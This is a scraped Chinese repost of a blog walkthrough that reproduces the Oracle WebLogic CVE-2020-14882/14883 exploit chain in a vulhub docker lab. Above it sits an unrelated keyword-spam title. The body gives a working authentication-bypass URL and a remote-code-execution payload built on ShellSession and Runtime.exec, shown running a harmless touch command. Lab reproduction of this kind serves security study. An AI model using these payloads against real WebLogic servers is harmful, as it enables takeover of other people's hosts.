您的位置:首页 > 科技 > 能源 > 网站群建设代理_多用户商城系统_搜索引擎营销总结_潍坊今日头条新闻最新

网站群建设代理_多用户商城系统_搜索引擎营销总结_潍坊今日头条新闻最新

2024/11/18 2:36:04 来源:https://blog.csdn.net/shw_yzh/article/details/142392776  浏览:    关键词:网站群建设代理_多用户商城系统_搜索引擎营销总结_潍坊今日头条新闻最新
网站群建设代理_多用户商城系统_搜索引擎营销总结_潍坊今日头条新闻最新

漏洞描述

32 CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。
CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。
使⽤这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任意命令并完全控制主机

影响版本

Oracle Weblogic Server 10.3.6.0
Oracle Weblogic Server 12.1.3.0
Oracle Weblogic Server 12.2.1.3
Oracle Weblogic Server 12.2.1.4
Oracle Weblogic Server 14.1.1.0

环境搭建

cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d

漏洞复现

1.访问管理控制台

http://172.16.1.78:7001/console/login/LoginForm.jsp

2.使⽤以下url绕过登录认证

http://172.16.1.78:7001 /console/css/%252e%252e%252fconsole.portal
此时达到未授权得效果。还未能GetShell。可以利⽤第⼆个漏洞(CVE-2020-14883),远程加载XML⽂件拿到Shell

3.⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令

http://172.16.1.78:7001/ console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")
我们进⼊到docker中可以看到命令已经成功运⾏了

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com